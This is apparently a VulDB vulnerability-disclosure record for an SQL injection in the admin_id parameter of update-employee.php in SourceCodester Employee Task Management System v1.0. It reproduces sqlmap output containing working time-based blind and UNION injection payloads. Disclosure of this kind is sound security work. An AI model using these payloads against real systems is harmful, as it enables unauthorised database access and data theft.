| Field | Value |
|---|---|
| Title | SourceCodester Employee Task Management System v1.0 SQL Injection in param admin_id in update-employee.php |
| Description | SQL Injection in param admin_id in update-employee.php (submitter's sqlmap output reproduced below) |
| Source | https://github.com/tht1997/WhiteBox/blob/main/sourcecodester/update-employee.md |
| User | huutuanbg97 (UID 45015) |
| Submission | 03/15/2024 14:44 (2 years ago) |
| Moderation | 03/16/2024 07:14 (16 hours later) |
| Status | Duplicate |
| VulDB entry | 257053 [SourceCodester Employee Task Management System 1.0 update-employee.php admin_id sql injection] |
| Points | 0 |

sqlmap output included with the submission:

```text
[20:40:26] [INFO] GET parameter 'admin_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:40:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:40:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:40:50] [INFO] target URL appears to be UNION injectable with 7 columns
[20:40:51] [INFO] GET parameter 'admin_id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'admin_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: admin_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: admin_id=28' AND (SELECT 9712 FROM (SELECT(SLEEP(5)))LThc) AND 'CUEh'='CUEh

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: admin_id=-3580' UNION ALL SELECT NULL,CONCAT(0x71786a7171,0x4d454655527a5759756977515963705172466b7571445763574e5955704353476273685474526846,0x71706b7171),NULL,NULL,NULL,NULL,NULL-- -
---
```